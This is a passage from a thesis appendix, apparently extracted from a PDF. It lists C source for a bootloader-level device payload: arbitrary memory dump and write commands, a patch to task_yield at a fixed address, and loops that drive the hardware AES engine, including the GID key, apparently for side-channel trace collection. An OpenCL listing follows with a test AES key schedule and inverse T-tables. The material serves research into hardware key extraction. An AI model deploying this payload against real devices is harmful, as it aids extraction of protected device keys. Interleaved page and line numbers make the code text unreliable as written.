\")\n"); 700 } 701 uart_puts(0,"exit measure mode\n"); 702 703 //restore task_yield to original value 704 *((uint16_t*)0x5ff1f008)=0xb5f0; 705 clear_icache(); 706 707 return 0; 708 } 709 710 711 int cmd_md(int argc, CmdArg* argv){ 712 if(argc != 3) { 713 _printf("usage: md \n"); 714 return 0; 715 } 716 char *addrstr = argv[1].string; 717 char *sizestr = argv[2].string; 718 719 if (sizestr[0] == ’0’ && sizestr[1] == ’x’){ 720 sizestr+=2; 721 } 722 if (addrstr[0] == ’0’ && addrstr[1] == ’x’){ 723 addrstr+=2; 724 } 725 uint32_t addr =0; 726 uint32_t size =0; 727 size_t rt =0; 728 729 parseHex(addrstr,&addr,&rt); 730 if (rt >4){ 731 _printf("ERROR: cmd_md addr %s too large (%d)\n",addrstr,rt); 732 return 0; 733 } 734 addr = bswap32(addr); 735 _printf("addrstr=%s (0x%08x)\n",addrstr,addr); 736 737 parseHex(sizestr,(char*)&size,&rt); 738 if (rt >4){ 739 _printf("ERROR: cmd_md size %s too large (%d)\n",sizestr,rt); 740 return 0; 741 } 742 size = bswap32(size); 743 744 _printf("dumping 0x%s (0x%08x) of size 0x%s (0x%08x)\n",addrstr,addr,sizestr,size); 745 DumpHex((void*)addr,size); 746 _printf("md done!\n"); 747 return 0; 748 } 749 750 int cmd_mw(int argc, CmdArg* argv){ 751 if(argc != 3) { 752 _printf("usage: md \n"); 753 return 0; 754 } 755 char *addrstr = argv[1].string; 756 char *datastr = argv[2].string; 757 758 if (addrstr[0] == ’0’ && addrstr[1] == ’x’){ 759 addrstr+=2; 760 } 84 BCode

761 762 unsigned char *addr =0; 763 uint32_t size =0; 764 size_t rt =0; 765 uint32_t tmp =0; 766 767 768 size_t bindatalen = strlen(datastr); 769 if (bindatalen &1){ 770 _printf("ERROR: cmd_mw data not multiple of 2\n"); 771 return 0; 772 } 773 774 unsigned char *bindata = _malloc(bindatalen+1); 775 776 parseHex(addrstr,(char*)&addr,&rt); 777 if (rt >4){ 778 _printf("ERROR: cmd_mw addr %s too large (%d)\n",addrstr,rt); 779 return 0; 780 } 781 addr = bswap32(addr); 782 783 if (!parseHex(datastr,(char*)bindata,&rt)){ 784 for (int i=0; i [data]\n"); 807 return 0; 808 } 809 810 action =(char*)argv[1].string; 811 kbag =(char*)argv[2].string; 812 813 size = atol(kbag); 814 _printf("aes_key insize=%d\n",size); 815 if((size&1)) { 816 _printf("ERROR: aes_encrypt_key\n"); 817 return 0; 818 } 819 aesIN = _malloc(size); 820 aesOUT = _malloc(size); 821 memset(aesIN,0,size); 822 memset(aesOUT,0,size); 85

823 824 if(!strcmp(action, "enc")) { 825 _printf("aes do enc\n"); 826 aes_encrypt_key_custom((char*)aesIN,(char*)aesOUT, size, fixedKey); 827 } else if(!strcmp(action, "loopSame")) { 828 while (gpio_read(GPIO_VOL_UP)){ 829 aes_decrypt_key_custom((char*)aesIN,(char*)aesOUT, size, fixedKey); 830 } 831 } else if(!strcmp(action, "loopSameGid")) { 832 while (gpio_read(GPIO_VOL_UP)){ 833 aes_decrypt_key((char*)aesIN,(char*)aesOUT, size); 834 } 835 } else if(!strcmp(action, "loopDiff")) { 836 while (gpio_read(GPIO_VOL_UP)){ 837 aes_encrypt_key_custom((char*)aesIN,(char*)aesOUT, size, fixedKey); 838 aes_encrypt_key_custom((char*)aesOUT,(char*)aesIN, size, fixedKey); 839 } 840 } else { 841 _free(aesOUT); 842 _free(aesIN); 843 return -1; 844 } 845 846 for(i =0;i < size; i++) { 847 _printf("%02x", aesOUT[i]); 848 } 849 _printf("\n"); 850 851 _free(aesOUT); 852 _free(aesIN); 853 return 0; 854 } 855 856 #pragma mark aes engine wrappers 857 858 unsigned int aes_encrypt_key(char* in, char* out, unsigned int size){ 859 aes_crypto_cmd(kAesEncrypt, in, out, size, kAesTypeGid | kAesType256,0,0); 860 return size; 861 } 862 863 unsigned int aes_decrypt_key(char* in, char* out, unsigned int size){ 864 aes_crypto_cmd(kAesDecrypt, in, out, size, kAesTypeGid | kAesType256,0,0); 865 return size; 866 } 867 868 unsigned int aes_encrypt_key_custom(char* in, char* out, unsigned int size, void *key){ 869 aes_crypto_cmd(kAesEncrypt, in, out, size, kAesTypeUser | kAesType256, key,0); 870 return size; 871 } 872 873 unsigned int aes_decrypt_key_custom(char* in, char* out, unsigned int size, void *key){ 874 aes_crypto_cmd(kAesDecrypt, in, out, size, kAesTypeUser | kAesType256, key,0); 875 return size; 876 } 877 878 #pragma mark helper functions 879 880 uint32_t bswap32(uint32_t num){ 881 return ((num>>24)&0xff)|// move byte 3 to byte 0 882 ((num<<8)&0xff0000)|// move byte 1 to byte 2 883 ((num>>8)&0xff00)|// move byte 2 to byte 1 884 ((num<<24)&0xff000000); // byte 0 to byte 3 86 BCode

885 } 886 887 int parseHex(const char *instr, char *ret, size_t *outSize){ 888 size_t nonceLen = strlen(instr); 889 nonceLen =(nonceLen>>1) + (nonceLen&1); //one byte more if len is odd 890 891 if (outSize)*outSize =(nonceLen)*sizeof(char); 892 if (!ret) return 0; 893 894 memset(ret,0,*outSize); 895 unsigned int nlen =0; 896 897 int next =(strlen(instr)&1) == 0; 898 char tmp =0; 899 while (*instr){ 900 char c =*(instr++); 901 902 tmp *=16; 903 if (c >= ’0’ && c<=’9’){ 904 tmp += c - ’0’; 905 }else if (c >= ’a’ && c <= ’f’){ 906 tmp += 10 + c - ’a’; 907 }else if (c >= ’A’ && c <= ’F’){ 908 tmp += 10 + c - ’A’; 909 }else{ 910 return -1; //ERROR parsing failed 911 } 912 if ((next =! next)&&nlen < nonceLen) ret[nlen++] = tmp,tmp=0; 913 } 914 915 if (outSize)*outSize = nlen; 916 return 0; 917 } 918 919 void DumpHex(const void* data, size_t size){ 920 char ascii[17]; 921 size_t i, j; 922 ascii[16] = ’\0’; 923 for (i =0;i < size;++i){ 924 _printf("%02X ",((unsigned char*)data)[i]); 925 if (((unsigned char*)data)[i]>=’ ’ && ((unsigned char*)data)[i]<=’~’){ 926 ascii[i % 16] = ((unsigned char*)data)[i]; 927 } else { 928 ascii[i % 16] = ’.’; 929 } 930 if ((i+1) % 8 == 0 || i+1 == size){ 931 _printf(" "); 932 if ((i+1) % 16 == 0) { 933 _printf("| %s \n", ascii); 934 } else if (i+1 == size){ 935 ascii[(i+1) % 16] = ’\0’; 936 if ((i+1) % 16 <= 8) { 937 _printf(" "); 938 } 939 for (j =(i+1) % 16; j < 16; ++j){ 940 _printf(" "); 941 } 942 _printf("| %s \n", ascii); 943 } 944 } 945 } 946 } 87

947 948 void clear_icache() { 949 __asm__("mov r0, #0"); 950 __asm__("mcr p15, 0, r0, c7, c5, 0"); 951 __asm__("isb"); 952 __asm__("nop"); 953 __asm__("nop"); 954 __asm__("nop"); 955 __asm__("nop"); 956 }; 957 958 #pragma mark stdfuncs 959 960 void memset(void *a, unsigned char b, size_t len){ 961 while(len--){ 962 *((unsigned char*)a)=b; 963 a =((unsigned char*)a)+1; 964 } 965 } 966 967 void memmove(void *dst, void *src, size_t len){ 968 uint8_t *d =(uint8_t *)dst; 969 uint8_t *s =(uint8_t *)src; 970 while (len--) { 971 *d++ = *s++; 972 } 973 } 974 975 int strncmp(const char *a, const char *b, uint32_t n){ 976 char d =0; 977 while (n-- && *a && !(d =*a++ - *b++)); 978 return d; 979 } 980 981 int strcmp(const char *a, const char *b){ 982 char d =0; 983 while (*a && !(d =*a++ - *b++)); 984 return d; 985 } 986 987 int strlen(const char *s){ 988 int res =0; 989 for (; *s++; res++); 990 return res; 991 } 992 993 long atol(const char *s){ 994 long res =0; 995 int neg =0; 996 while (*s == ’ ’) s++; 997 998 if (*s == ’-’){ 999 s++; 1000 neg=1; 1001 } 1002 1003 do{ 1004 if (*s < ’0’ || *s > ’9’) return (neg)?-res : res; 1005 res *= 10; 1006 res += *s - ’0’; 1007 }while(*++s); 1008 88 BCode

1009 return (neg)?-res : res; 1010 } 1011 1012 #pragma mark AES 1013 1014 void aes_precompute_tables(){ 1015 T0 = _malloc(256*sizeof(uint32_t)); 1016 T1 = _malloc(256*sizeof(uint32_t)); 1017 T2 = _malloc(256*sizeof(uint32_t)); 1018 T3 = _malloc(256*sizeof(uint32_t)); 1019 for (int x=0; x<0x100; x++) { 1020 uint8_t b[4]; 1021 b[0] = sbox[x]; 1022 b[1] = sbox[x]; 1023 b[2] = sbox[x]; 1024 b[3] = sbox[x]; 1025 1026 b[0] = ((b[0] & 0x80)==0)?(b[0] << 1) : (b[0] << 1) ^ 0x1b; 1027 b[3] = ((b[3] & 0x80)==0)?(b[3] << 1) : (b[3] << 1) ^ 0x1b; 1028 b[3] ^= b[1]; 1029 1030 T0[x]=(b[0] << 0) | (b[1] << 8) | (b[2] << 16) | (b[3] << 24); 1031 T1[x]=(b[3] << 0) | (b[0] << 8) | (b[1] << 16) | (b[2] << 24); 1032 T2[x]=(b[2] << 0) | (b[3] << 8) | (b[0] << 16) | (b[1] << 24); 1033 T3[x]=(b[1] << 0) | (b[2] << 8) | (b[3] << 16) | (b[0] << 24); 1034 } 1035 } 1036 1037 1038 void aes_encrypt(uint8_t plaintext[16], uint8_t roundkeys[11][16], uint8_t ciphertext[16]){ 1039 uint8_t tmp[16] = {0}; 1040 1041 for (int i=0; i<16; i++){ //pre key add 1042 tmp[i]=plaintext[i]^roundkeys[0][i]; 1043 } 1044 1045 uint32_t w[4] = {0}; 1046 for (int i=1; i<10; i++) { //9 middle rounds 1047 1048 w[0] = T0[tmp[0]]^T1[tmp[5]]^T2[tmp[10]] ^ T3[tmp[15]] ^ *(uint32_t*)&roundkeys[i ][0]; 1049 w[1] = T0[tmp[4]]^T1[tmp[ 9]] ^ T2[tmp[14]] ^ T3[tmp[3]]^*(uint32_t*)&roundkeys[i ][4]; 1050 w[2] = T0[tmp[8]]^T1[tmp[13]] ^ T2[tmp[2]]^T3[tmp[7]]^*(uint32_t*)&roundkeys[i ][8]; 1051 w[3] = T0[tmp[12]] ^ T1[tmp[1]]^T2[tmp[ 6]] ^ T3[tmp[11]] ^ *(uint32_t*)&roundkeys[i ][12]; 1052 1053 *(uint32_t*)&tmp[0]=w[0]; 1054 *(uint32_t*)&tmp[4]=w[1]; 1055 *(uint32_t*)&tmp[8]=w[2]; 1056 *(uint32_t*)&tmp[12] = w[3]; 1057 } 1058 1059 for (int i=0; i<4; i++) { //final round 1060 ciphertext[4*i +0]=sbox[tmp[4*i ]] ^ roundkeys[10][4*i +0]; 1061 ciphertext[4*i +1]=sbox[tmp[(4*i +5)&0xf]] ^ roundkeys[10][4*i +1]; 1062 ciphertext[4*i +2]=sbox[tmp[(4*i +10)&0xf]] ^ roundkeys[10][4*i +2]; 1063 ciphertext[4*i +3]=sbox[tmp[(4*i +15)&0xf]] ^ roundkeys[10][4*i +3]; 1064 } 1065 } 89

Listing B.4: Source code for device payload

1 #define AES_BLOCK_SELECTOR 4 2 #define AES_BLOCKS_TOTAL 8 //8*16 = 128bytes 3 4 #define G_SELECTOR_ROUND 4 5 6 struct MeasurementStructure{ 7 uint NumberOfPoints; 8 9 uchar _shiftp[AES_BLOCK_SELECTOR*16]; 10 uchar Input[AES_BLOCKS_TOTAL*16 - AES_BLOCK_SELECTOR*16]; 11 12 uchar _shiftc[AES_BLOCK_SELECTOR*16]; 13 uchar Output[AES_BLOCKS_TOTAL*16 - AES_BLOCK_SELECTOR*16]; 14 15 char Trace[0]; 16 }; 17 18 struct Tracefile{ 19 uint tracesInFile; 20 struct MeasurementStructure ms[0]; 21 }; 22 23 __constant uchar aeskey[16*15] = { 24 0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0x0e,0x0f,

25 0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0x0e,0x0f,

26 0xd6,0xaa,0x74,0xfd,0xd2,0xaf,0x72,0xfa,0xda,0xa6,0x78,0xf1,0xd6,0xab,0x76,0xfe,

27 0xf6,0x63,0x3a,0xb8,0xf2,0x66,0x3c,0xbf,0xfa,0x6f,0x36,0xb4,0xf6,0x62,0x38,0xbb,

28 0x7e,0xad,0x9e,0xbf,0xac,0x02,0xec,0x45,0x76,0xa4,0x94,0xb4,0xa0,0x0f,0xe2,0x4a,

29 0x16,0x15,0xa2,0x6e,0xe4,0x73,0x9e,0xd1,0x1e,0x1c,0xa8,0x65,0xe8,0x7e,0x90,0xde,

30 0x89,0xcd,0x83,0x24,0x25,0xcf,0x6f,0x61,0x53,0x6b,0xfb,0xd5,0xf3,0x64,0x19,0x9f,

31 0x1b,0x56,0x76,0xb5,0xff,0x25,0xe8,0x64,0xe1,0x39,0x40,0x01,0x09,0x47,0xd0,0xdf,

32 0x21,0xbd,0x1d,0x25,0x04,0x72,0x72,0x44,0x57,0x19,0x89,0x91,0xa4,0x7d,0x90,0x0e,

33 0x52,0xa9,0x16,0x1e,0xad,0x8c,0xfe,0x7a,0x4c,0xb5,0xbe,0x7b,0x45,0xf2,0x6e,0xa4,

34 0xb8,0x22,0x54,0x4b,0xbc,0x50,0x26,0x0f,0xeb,0x49,0xaf,0x9e,0x4f,0x34,0x3f,0x90,

35 0xd6,0xb1,0x63,0x7e,0x7b,0x3d,0x9d,0x04,0x37,0x88,0x23,0x7f,0x72,0x7a,0x4d,0xdb,

36 0x42,0xc1,0xed,0x0b,0xfe,0x91,0xcb,0x04,0x15,0xd8,0x64,0x9a,0x5a,0xec,0x5b,0x0a,

37 0x68,0x7f,0x5a,0x19,0x13,0x42,0xc7,0x1d,0x24,0xca,0xe4,0x62,0x56,0xb0,0xa9,0xb9,

38 0xe5,0x12,0xbb,0xba,0x1b,0x83,0x70,0xbe,0x0e,0x5b,0x14,0x24,0x54,0xb7,0x4f,0x2e 39 }; 40 41 __constant uint T0_inv[256]={ 42 0x50a7f451,0x5365417e,0xc3a4171a,0x965e273a,0xcb6bab3b,0xf1459d1f,0xab58faac,0x9303e34b,0x55fa3020 ,0xf66d76ad,0x9176cc88,0x254c02f5,0xfcd7e54f,0xd7cb2ac5,0x80443526,0x8fa362b5, 43 0x495ab1de,0x671bba25,0x980eea45,0xe1c0fe5d,0x02752fc3,0x12f04c81,0xa397468d,0xc6f9d36b,0xe75f8f03 90 BCode

,0x959c9215,0xeb7a6dbf,0xda595295,0x2d83bed4,0xd3217458,0x2969e049,0x44c8c98e, 44 0x6a89c275,0x78798ef4,0x6b3e5899,0xdd71b927,0xb64fe1be,0x17ad88f0,0x66ac20c9,0xb43ace7d,0x184adf63 ,0x82311ae5,0x60335197,0x457f5362,0xe07764b1,0x84ae6bbb,0x1ca081fe,0x942b08f9, 45 0x58684870,0x19fd458f,0x876cde94,0xb7f87b52,0x23d373ab,0xe2024b72,0x578f1fe3,0x2aab5566,0x0728ebb2 ,0x03c2b52f,0x9a7bc586,0xa50837d3,0xf2872830,0xb2a5bf23,0xba6a0302,0x5c8216ed, 46 0x2b1ccf8a,0x92b479a7,0xf0f207f3,0xa1e2694e,0xcdf4da65,0xd5be0506,0x1f6234d1,0x8afea6c4,0x9d532e34 ,0xa055f3a2,0x32e18a05,0x75ebf6a4,0x39ec830b,0xaaef6040,0x069f715e,0x51106ebd, 47 0xf98a213e,0x3d06dd96,0xae053edd,0x46bde64d,0xb58d5491,0x055dc471,0x6fd40604,0xff155060,0x24fb9819 ,0x97e9bdd6,0xcc434089,0x779ed967,0xbd42e8b0,0x888b8907,0x385b19e7,0xdbeec879, 48 0x470a7ca1,0xe90f427c,0xc91e84f8,0x00000000,0x83868009,0x48ed2b32,0xac70111e,0x4e725a6c,0xfbff0efd ,0x5638850f,0x1ed5ae3d,0x27392d36,0x64d90f0a,0x21a65c68,0xd1545b9b,0x3a2e3624, 49 0xb1670a0c,0x0fe75793,0xd296eeb4,0x9e919b1b,0x4fc5c080,0xa220dc61,0x694b775a,0x161a121c,0x0aba93e2 ,0xe52aa0c0,0x43e0223c,0x1d171b12,0x0b0d090e,0xadc78bf2,0xb9a8b62d,0xc8a91e14, 50 0x8519f157,0x4c0775af,0xbbdd99ee,0xfd607fa3,0x9f2601f7,0xbcf5725c,0xc53b6644,0x347efb5b,0x7629438b ,0xdcc623cb,0x68fcedb6,0x63f1e4b8,0xcadc31d7,0x10856342,0x40229713,0x2011c684, 51 0x7d244a85,0xf83dbbd2,0x1132f9ae,0x6da129c7,0x4b2f9e1d,0xf330b2dc,0xec52860d,0xd0e3c177,0x6c16b32b ,0x99b970a9,0xfa489411,0x2264e947,0xc48cfca8,0x1a3ff0a0,0xd82c7d56,0xef903322, 52 0xc74e4987,0xc1d138d9,0xfea2ca8c,0x360bd498,0xcf81f5a6,0x28de7aa5,0x268eb7da,0xa4bfad3f,0xe49d3a2c ,0x0d927850,0x9bcc5f6a,0x62467e54,0xc2138df6,0xe8b8d890,0x5ef7392e,0xf5afc382, 53 0xbe805d9f,0x7c93d069,0xa92dd56f,0xb31225cf,0x3b99acc8,0xa77d1810,0x6e639ce8,0x7bbb3bdb,0x097826cd ,0xf418596e,0x01b79aec,0xa89a4f83,0x656e95e6,0x7ee6ffaa,0x08cfbc21,0xe6e815ef, 54 0xd99be7ba,0xce366f4a,0xd4099fea,0xd67cb029,0xafb2a431,0x31233f2a,0x3094a5c6,0xc066a235,0x37bc4e74 ,0xa6ca82fc,0xb0d090e0,0x15d8a733,0x4a9804f1,0xf7daec41,0x0e50cd7f,0x2ff69117, 55 0x8dd64d76,0x4db0ef43,0x544daacc,0xdf0496e4,0xe3b5d19e,0x1b886a4c,0xb81f2cc1,0x7f516546,0x04ea5e9d ,0x5d358c01,0x737487fa,0x2e410bfb,0x5a1d67b3,0x52d2db92,0x335610e9,0x1347d66d, 56 0x8c61d79a,0x7a0ca137,0x8e14f859,0x893c13eb,0xee27a9ce,0x35c961b7,0xede51ce1,0x3cb1477a,0x59dfd29c ,0x3f73f255,0x79ce1418,0xbf37c773,0xeacdf753,0x5baafd5f,0x146f3ddf,0x86db4478, 57 0x81f3afca,0x3ec468b9,0x2c342438,0x5f40a3c2,0x72c31d16,0x0c25e2bc,0x8b493c28,0x41950dff,0x7101a839 ,0xdeb30c08,0x9ce4b4d8,0x90c15664,0x6184cb7b,0x70b632d5,0x745c6c48,0x4257b8d0}; 58 59 __constant uint T1_inv[256]={ 60 0xa7f45150,0x65417e53,0xa4171ac3,0x5e273a96,0x6bab3bcb,0x459d1ff1,0x58faacab,0x03e34b93,0xfa302055 ,0x6d76adf6,0x76cc8891,0x4c02f525,0xd7e54ffc,0xcb2ac5d7,0x44352680,0xa362b58f, 61 0x5ab1de49,0x1bba2567,0x0eea4598,0xc0fe5de1,0x752fc302,0xf04c8112,0x97468da3,0xf9d36bc6,0x5f8f03e7 ,0x9c921595,0x7a6dbfeb,0x595295da,0x83bed42d,0x217458d3,0x69e04929,0xc8c98e44, 62 0x89c2756a,0x798ef478,0x3e58996b,0x71b927dd,0x4fe1beb6,0xad88f017,0xac20c966,0x3ace7db4,0x4adf6318 ,0x311ae582,0x33519760,0x7f536245,0x7764b1e0,0xae6bbb84,0xa081fe1c,0x2b08f994, 63 0x68487058,0xfd458f19,0x6cde9487,0xf87b52b7,0xd373ab23,0x024b72e2,0x8f1fe357,0xab55662a,0x28ebb207 ,0xc2b52f03,0x7bc5869a,0x0837d3a5,0x872830f2,0xa5bf23b2,0x6a0302ba,0x8216ed5c, 64 0x1ccf8a2b,0xb479a792,0xf207f3f0,0xe2694ea1,0xf4da65cd,0xbe0506d5,0x6234d11f,0xfea6c48a,0x532e349d ,0x55f3a2a0,0xe18a0532,0xebf6a475,0xec830b39,0xef6040aa,0x9f715e06,0x106ebd51, 65 0x8a213ef9,0x06dd963d,0x053eddae,0xbde64d46,0x8d5491b5,0x5dc47105,0xd406046f,0x155060ff,0xfb981924 ,0xe9bdd697,0x434089cc,0x9ed96777,0x42e8b0bd,0x8b890788,0x5b19e738,0xeec879db, 66 0x0a7ca147,0x0f427ce9,0x1e84f8c9,0x00000000,0x86800983,0xed2b3248,0x70111eac,0x725a6c4e,0xff0efdfb ,0x38850f56,0xd5ae3d1e,0x392d3627,0xd90f0a64,0xa65c6821,0x545b9bd1,0x2e36243a, 67 0x670a0cb1,0xe757930f,0x96eeb4d2,0x919b1b9e,0xc5c0804f,0x20dc61a2,0x4b775a69,0x1a121c16,0xba93e20a ,0x2aa0c0e5,0xe0223c43,0x171b121d,0x0d090e0b,0xc78bf2ad,0xa8b62db9,0xa91e14c8, 68 0x19f15785,0x0775af4c,0xdd99eebb,0x607fa3fd,0x2601f79f,0xf5725cbc,0x3b6644c5,0x7efb5b34,0x29438b76 ,0xc623cbdc,0xfcedb668,0xf1e4b863,0xdc31d7ca,0x85634210,0x22971340,0x11c68420, 69 0x244a857d,0x3dbbd2f8,0x32f9ae11,0xa129c76d,0x2f9e1d4b,0x30b2dcf3,0x52860dec,0xe3c177d0,0x16b32b6c ,0xb970a999,0x489411fa,0x64e94722,0x8cfca8c4,0x3ff0a01a,0x2c7d56d8,0x903322ef, 70 0x4e4987c7,0xd138d9c1,0xa2ca8cfe,0x0bd49836,0x81f5a6cf,0xde7aa528,0x8eb7da26,0xbfad3fa4,0x9d3a2ce4 ,0x9278500d,0xcc5f6a9b,0x467e5462,0x138df6c2,0xb8d890e8,0xf7392e5e,0xafc382f5, 71 0x805d9fbe,0x93d0697c,0x2dd56fa9,0x1225cfb3,0x99acc83b,0x7d1810a7,0x639ce86e,0xbb3bdb7b,0x7826cd09 ,0x18596ef4,0xb79aec01,0x9a4f83a8,0x6e95e665,0xe6ffaa7e,0xcfbc2108,0xe815efe6, 72 0x9be7bad9,0x366f4ace,0x099fead4,0x7cb029d6,0xb2a431af,0x233f2a31,0x94a5c630,0x66a235c0,0xbc4e7437 ,0xca82fca6,0xd090e0b0,0xd8a73315,0x9804f14a,0xdaec41f7,0x50cd7f0e,0xf691172f, 73 0xd64d768d,0xb0ef434d,0x4daacc54,0x0496e4df,0xb5d19ee3,0x886a4c1b,0x1f2cc1b8,0x5165467f,0xea5e9d04 ,0x358c015d,0x7487fa73,0x410bfb2e,0x1d67b35a,0xd2db9252,0x5610e933,0x47d66d13, 74 0x61d79a8c,0x0ca1377a,0x14f8598e,0x3c13eb89,0x27a9ceee,0xc961b735,0xe51ce1ed,0xb1477a3c,0xdfd29c59 ,0x73f2553f,0xce141879,0x37c773bf,0xcdf753ea,0xaafd5f5b,0x6f3ddf14,0xdb447886, 75 0xf3afca81,0xc468b93e,0x3424382c,0x40a3c25f,0xc31d1672,0x25e2bc0c,0x493c288b,0x950dff41,0x01a83971 91

,0xb30c08de,0xe4b4d89c,0xc1566490,0x84cb7b61,0xb632d570,0x5c6c4874,0x57b8d042}; 76 77 __constant uint T2_inv[256]={ 78 0xf45150a7,0x417e5365,0x171ac3a4,0x273a965e,0xab3bcb6b,0x9d1ff145,0xfaacab58,0xe34b9303,0x302055fa ,0x76adf66d,0xcc889176,0x02f5254c,0xe54ffcd7,0x2ac5d7cb,0x35268044,0x62b58fa3, 79 0xb1de495a,0xba25671b,0xea45980e,0xfe5de1c0,0x2fc30275,0x4c8112f0,0x468da397,0xd36bc6f9,0x8f03e75f ,0x9215959c,0x6dbfeb7a,0x5295da59,0xbed42d83,0x7458d321,0xe0492969,0xc98e44c8, 80 0xc2756a89,0x8ef47879,0x58996b3e,0xb927dd71,0xe1beb64f,0x88f017ad,0x20c966ac,0xce7db43a,0xdf63184a ,0x1ae58231,0x51976033,0x5362457f,0x64b1e077,0x6bbb84ae,0x81fe1ca0,0x08f9942b, 81 0x48705868,0x458f19fd,0xde94876c,0x7b52b7f8,0x73ab23d3,0x4b72e202,0x1fe3578f,0x55662aab,0xebb20728 ,0xb52f03c2,0xc5869a7b,0x37d3a508,0x2830f287,0xbf23b2a5,0x0302ba6a,0x16ed5c82, 82 0xcf8a2b1c,0x79a792b4,0x07f3f0f2,0x694ea1e2,0xda65cdf4,0x0506d5be,0x34d11f62,0xa6c48afe,0x2e349d53 ,0xf3a2a055,0x8a0532e1,0xf6a475eb,0x830b39ec,0x6040aaef,0x715e069f,0x6ebd5110, 83 0x213ef98a,0xdd963d06,0x3eddae05,0xe64d46bd,0x5491b58d,0xc471055d,0x06046fd4,0x5060ff15,0x981924fb ,0xbdd697e9,0x4089cc43,0xd967779e,0xe8b0bd42,0x8907888b,0x19e7385b,0xc879dbee, 84 0x7ca1470a,0x427ce90f,0x84f8c91e,0x00000000,0x80098386,0x2b3248ed,0x111eac70,0x5a6c4e72,0x0efdfbff ,0x850f5638,0xae3d1ed5,0x2d362739,0x0f0a64d9,0x5c6821a6,0x5b9bd154,0x36243a2e, 85 0x0a0cb167,0x57930fe7,0xeeb4d296,0x9b1b9e91,0xc0804fc5,0xdc61a220,0x775a694b,0x121c161a,0x93e20aba ,0xa0c0e52a,0x223c43e0,0x1b121d17,0x090e0b0d,0x8bf2adc7,0xb62db9a8,0x1e14c8a9, 86 0xf1578519,0x75af4c07,0x99eebbdd,0x7fa3fd60,0x01f79f26,0x725cbcf5,0x6644c53b,0xfb5b347e,0x438b7629 ,0x23cbdcc6,0xedb668fc,0xe4b863f1,0x31d7cadc,0x63421085,0x97134022,0xc6842011, 87 0x4a857d24,0xbbd2f83d,0xf9ae1132,0x29c76da1,0x9e1d4b2f,0xb2dcf330,0x860dec52,0xc177d0e3,0xb32b6c16 ,0x70a999b9,0x9411fa48,0xe9472264,0xfca8c48c,0xf0a01a3f,0x7d56d82c,0x3322ef90, 88 0x4987c74e,0x38d9c1d1,0xca8cfea2,0xd498360b,0xf5a6cf81,0x7aa528de,0xb7da268e,0xad3fa4bf,0x3a2ce49d ,0x78500d92,0x5f6a9bcc,0x7e546246,0x8df6c213,0xd890e8b8,0x392e5ef7,0xc382f5af, 89 0x5d9fbe80,0xd0697c93,0xd56fa92d,0x25cfb312,0xacc83b99,0x1810a77d,0x9ce86e63,0x3bdb7bbb,0x26cd0978 ,0x596ef418,0x9aec01b7,0x4f83a89a,0x95e6656e,0xffaa7ee6,0xbc2108cf,0x15efe6e8, 90 0xe7bad99b,0x6f4ace36,0x9fead409,0xb029d67c,0xa431afb2,0x3f2a3123,0xa5c63094,0xa235c066,0x4e7437bc ,0x82fca6ca,0x90e0b0d0,0xa73315d8,0x04f14a98,0xec41f7da,0xcd7f0e50,0x91172ff6, 91 0x4d768dd6,0xef434db0,0xaacc544d,0x96e4df04,0xd19ee3b5,0x6a4c1b88,0x2cc1b81f,0x65467f51,0x5e9d04ea ,0x8c015d35,0x87fa7374,0x0bfb2e41,0x67b35a1d,0xdb9252d2,0x10e93356,0xd66d1347, 92 0xd79a8c61,0xa1377a0c,0xf8598e14,0x13eb893c,0xa9ceee27,0x61b735c9,0x1ce1ede5,0x477a3cb1,0xd29c59df ,0xf2553f73,0x141879ce,0xc773bf37,0xf753eacd,0xfd5f5baa,0x3ddf146f,0x447886db, 93 0xafca81f3,0x68b93ec4,0x24382c34,0xa3c25f40,0x1d1672c3,0xe2bc0c25,0x3c288b49,0x0dff4195,0xa8397101 ,0x0c08deb3,0xb4d89ce4,0x566490c1,0xcb7b6184,0x32d570b6,0x6c48745c,0xb8d04257}; 94 95 __constant uint T3_inv[256]={ 96 0x5150a7f4,0x7e536541,0x1ac3a417,0x3a965e27,0x3bcb6bab,0x1ff1459d,0xacab58fa,0x4b9303e3,0x2055fa30 ,0xadf66d76,0x889176cc,0xf5254c02,0x4ffcd7e5,0xc5d7cb2a,0x26804435,0xb58fa362, 97 0xde495ab1,0x25671bba,0x45980eea,0x5de1c0fe,0xc302752f,0x8112f04c,0x8da39746,0x6bc6f9d3,0x03e75f8f ,0x15959c92,0xbfeb7a6d,0x95da5952,0xd42d83be,0x58d32174,0x492969e0,0x8e44c8c9, 98 0x756a89c2,0xf478798e,0x996b3e58,0x27dd71b9,0xbeb64fe1,0xf017ad88,0xc966ac20,0x7db43ace,0x63184adf ,0xe582311a,0x97603351,0x62457f53,0xb1e07764,0xbb84ae6b,0xfe1ca081,0xf9942b08, 99 0x70586848,0x8f19fd45,0x94876cde,0x52b7f87b,0xab23d373,0x72e2024b,0xe3578f1f,0x662aab55,0xb20728eb ,0x2f03c2b5,0x869a7bc5,0xd3a50837,0x30f28728,0x23b2a5bf,0x02ba6a03,0xed5c8216, 100 0x8a2b1ccf,0xa792b479,0xf3f0f207,0x4ea1e269,0x65cdf4da,0x06d5be05,0xd11f6234,0xc48afea6,0x349d532e ,0xa2a055f3,0x0532e18a,0xa475ebf6,0x0b39ec83,0x40aaef60,0x5e069f71,0xbd51106e, 101 0x3ef98a21,0x963d06dd,0xddae053e,0x4d46bde6,0x91b58d54,0x71055dc4,0x046fd406,0x60ff1550,0x1924fb98 ,0xd697e9bd,0x89cc4340,0x67779ed9,0xb0bd42e8,0x07888b89,0xe7385b19,0x79dbeec8, 102 0xa1470a7c,0x7ce90f42,0xf8c91e84,0x00000000,0x09838680,0x3248ed2b,0x1eac7011,0x6c4e725a,0xfdfbff0e ,0x0f563885,0x3d1ed5ae,0x3627392d,0x0a64d90f,0x6821a65c,0x9bd1545b,0x243a2e36, 103 0x0cb1670a,0x930fe757,0xb4d296ee,0x1b9e919b,0x804fc5c0,0x61a220dc,0x5a694b77,0x1c161a12,0xe20aba93 ,0xc0e52aa0,0x3c43e022,0x121d171b,0x0e0b0d09,0xf2adc78b,0x2db9a8b6,0x14c8a91e, 104 0x578519f1,0xaf4c0775,0xeebbdd99,0xa3fd607f,0xf79f2601,0x5cbcf572,0x44c53b66,0x5b347efb,0x8b762943 ,0xcbdcc623,0xb668fced,0xb863f1e4,0xd7cadc31,0x42108563,0x13402297,0x842011c6, 105 